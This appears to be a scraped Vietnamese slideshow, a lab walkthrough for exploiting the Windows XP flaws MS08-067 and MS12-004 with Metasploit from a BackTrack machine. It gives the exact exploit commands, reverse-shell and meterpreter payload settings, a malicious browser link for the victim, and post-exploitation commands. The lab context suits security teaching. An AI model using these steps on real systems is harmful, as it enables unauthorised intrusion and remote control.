Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Tấn công lỗ hỏng ms12 004 & ms08 067

1,766 views

Published on

  • Be the first to comment

  • Be the first to like this

Tấn công lỗ hỏng ms12 004 & ms08 067

  1. 1. I. Khai thác lỗ hổng trên Windows XP với mã lỗi ms08_067 Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân) Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.154.128 Các bước thực hiện: Kiểm tra mạng giữa XP và máy Back Track 5r3: Máy Back Track 5r3: Máy Xp: Kiểm tra thông mạng:
  2. 2. Trên máy Back track 5r3 ta gõ đường dẫn: cd /pentest/exploits/framework Ta tiếp tục gõ lệnh: ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129 LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp E
  3. 3. Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3. Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp Cuối cùng ta đã tấn công được Xp, ta biết được các thông số của máy Xp
  4. 4. . II. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004 Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3 Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004
  5. 5. Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được. Dùng lệnh show options để biết thêm các câu lệnh cần thiết.
  6. 6. Dùng lệnh SRVHOST <địa chỉ ip máy backtrack> Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp Dùng lệnh set LHOST <ip backtrack>
  7. 7. Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn này sẽ bị hack. Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.1.3 Trên máy XP ta vào trình duyệt web và gõ đường dẫnhttp://192.168.1.2:8080/
  8. 8. Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó. Trên máy back track ta gõ lệnh sessions để kiểm tra.
  9. 9. Dùng lệnh sessions –i 1 Xem trước thông tin XP: Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang truy cập.
  10. 10. Gõ sysinfo để biết thông tin chi tiết máy Xp: Gõ lệnh shell để vào ổ đĩa máy XP: Giờ thì ta có thể xem được các file trong ổ đĩa của máy XP.

×